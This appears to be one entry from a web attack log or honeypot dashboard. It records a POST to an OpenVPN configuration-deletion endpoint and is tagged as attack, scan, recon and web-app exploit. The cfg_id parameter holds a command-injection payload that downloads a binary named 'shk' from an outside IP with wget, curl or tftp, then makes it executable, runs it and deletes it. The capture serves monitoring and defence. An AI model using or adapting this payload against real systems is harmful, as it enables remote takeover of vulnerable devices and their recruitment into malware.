# Remote Address Threat Level Method Path Query String Headers Body Acceptable Timestamp Port Request Types Attack Types Analyse Request Other Requests by Actor CSV Dump
1 141.255.167.250 6 POST /ajax/openvpn/del_ovpncfg.php
Header Value
Host 167.172.53.140:80
User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Content-Length 222
Content-Type application/json
Parameter Value
cfg_id ;cd /tmp || cd /var/tmp; rm -rf shk; wget http://14.225.204.172/shk || curl http://14.225.204.172/shk || tftp 14.225.204.172 -c get shk || tftp -g -r shk 14.225.204.172; chmod 777 shk; ./shk rasp; rm -rf shk;#
False 2024-05-15 12:58:12.905795 80
ATTACK
SCAN
RECON
WEBAPP_VULN